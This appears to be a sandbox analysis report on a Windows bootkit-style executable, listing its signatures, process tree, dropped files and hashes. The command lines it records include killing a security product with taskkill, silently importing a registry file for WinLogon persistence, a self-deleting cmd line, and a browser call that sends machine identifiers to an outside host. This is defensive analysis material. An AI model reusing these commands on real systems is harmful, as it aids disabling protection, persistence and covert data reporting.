Overview

overview

10

Static

static

d48f9b157d...90.exe

windows7-x64

10

d48f9b157d...90.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    170s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2022, 11:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe

  • Size

    208KB

  • MD5

    1690e0408b941cfe9f8d8ffe46bb9481

  • SHA1

    03d3a9c8e5bff263caa06c4795bd4dca2d1561c7

  • SHA256

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190

  • SHA512

    02a272ca995f123df7becf79b4b3a17b11f5fbcfbcac070c001d20b79a07035cdc99b10a72554728591b6370e3eedb58649dc4fff102322fc2fa06ecb67d6bc6

  • SSDEEP

    6144:jZA/L880NEJji+5rqqULirD2Ei/NjO50p8I4cC:je/L880NEJjBdrm/fGI4D

Score
10/10
bootkitevasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Executes dropped EXE 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
    adwarespyware
  • Modifies registry class 10 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
    "C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4628
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ZhuDongFangyu.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:636
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.baigezi.com/shenjingyuan/get.asp?mac=5203DB9D3EF&makedate=QM00013&comput=Home&ver=79&userid=0001
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5084
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5084 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1624
    • C:\Windows\SysWOW64\3682\takesoft.exe
      C:\Windows\system32\3682\takesoft.exe C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe===
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:32
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Windows\SysWOW64\3682\test.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3896
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Windows\SysWOW64\3682\test.reg"
          4⤵
          • Modifies WinLogon for persistence
          • Runs .reg file with regedit
          PID:3468
      • C:\Windows\SysWOW64\3682\io5v11ce.exe
        C:\Windows\SysWOW64\3682\io5v11ce.exe
        3⤵
        • Modifies visibility of file extensions in Explorer
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ZhuDongFangyu.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4188
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\3682\io5v11ce.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1004
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 1
            5⤵
            • Runs ping.exe
            PID:1444

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\SysWOW64\3682\dasoft.encode
    Filesize

    21KB

    MD5

    cc52b4148c16a0e8158ef3e8ddbec04d

    SHA1

    217645a0d99809fbef89a6e1a2864ec3271aa21d

    SHA256

    25be46d9c91c13105ccbe57c88c50dd2a8618e1edd94d02305c0128ed3e947c6

    SHA512

    72fc6ef224cd198fda822a5e65859921faac90d30eb5503e00593f4d7c964696d5bc6a538a36b005be78e72466ccb6b2792969bc3ff776ba25e48ef19eed3830

    Download Submit

  • C:\Windows\SysWOW64\3682\io5v11ce.exe
    Filesize

    21KB

    MD5

    fda95ce112398a6472a4b0b28a67258c

    SHA1

    2f30086207b0ac0395830c529f2cecd05f867706

    SHA256

    b1682151ee4fbab8c581da5cef36ae621670f00414fad7e254fb3573a0cce2d8

    SHA512

    9adaec5a396dae16a01c5595212093428d633394e39fde48b099f6180ca0ce7e4599c3edc4f3b1bb68364f6f908030794bf7b5470cef168ab92dee22e2d7072b

    Download Submit

  • C:\Windows\SysWOW64\3682\io5v11ce.exe
    Filesize

    21KB

    MD5

    fda95ce112398a6472a4b0b28a67258c

    SHA1

    2f30086207b0ac0395830c529f2cecd05f867706

    SHA256

    b1682151ee4fbab8c581da5cef36ae621670f00414fad7e254fb3573a0cce2d8

    SHA512

    9adaec5a396dae16a01c5595212093428d633394e39fde48b099f6180ca0ce7e4599c3edc4f3b1bb68364f6f908030794bf7b5470cef168ab92dee22e2d7072b

    Download Submit

  • C:\Windows\SysWOW64\3682\takesoft.exe
    Filesize

    12KB

    MD5

    a5241366618c5617785aeffa02fd0586

    SHA1

    dac0682ec1f9eebcefedca0d0b81052f4e45a889

    SHA256

    898260e02a4348b63aa13ccfd293449fec88f158a08a4c000f3f5b31953115c4

    SHA512

    91d1e7026e3f525ed029bc556485b7a845968e074df5871e19c4312c5390298203ffd9e8d5e57aa27e9eba083f3d6be459e4826cbd92c1b0d9b2147f044fe2f8

    Download Submit

  • C:\Windows\SysWOW64\3682\takesoft.exe
    Filesize

    12KB

    MD5

    a5241366618c5617785aeffa02fd0586

    SHA1

    dac0682ec1f9eebcefedca0d0b81052f4e45a889

    SHA256

    898260e02a4348b63aa13ccfd293449fec88f158a08a4c000f3f5b31953115c4

    SHA512

    91d1e7026e3f525ed029bc556485b7a845968e074df5871e19c4312c5390298203ffd9e8d5e57aa27e9eba083f3d6be459e4826cbd92c1b0d9b2147f044fe2f8

    Download Submit

  • C:\Windows\SysWOW64\3682\test.reg
    Filesize

    206B

    MD5

    aafbc515e56620a59332edb997355b08

    SHA1

    c3927a56cf76eb7e4005c64393945349c9920c7e

    SHA256

    adc1b5de2e1f76368949fc90372c25d0ce06a60f63100a264d1b3c623ff7e69b

    SHA512

    a574404eaa573231163bef3424cccb5aee52539c4b8d4c4896dd2e6808a35159dd69e96dd135743ed83589af34bc701fe615e8925967cd81dce7a47d59392254

    Download Submit

  • memory/32-141-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/32-157-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/864-153-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

    Download

  • memory/864-155-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4628-142-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB

    Download

  • memory/4628-133-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB

    Download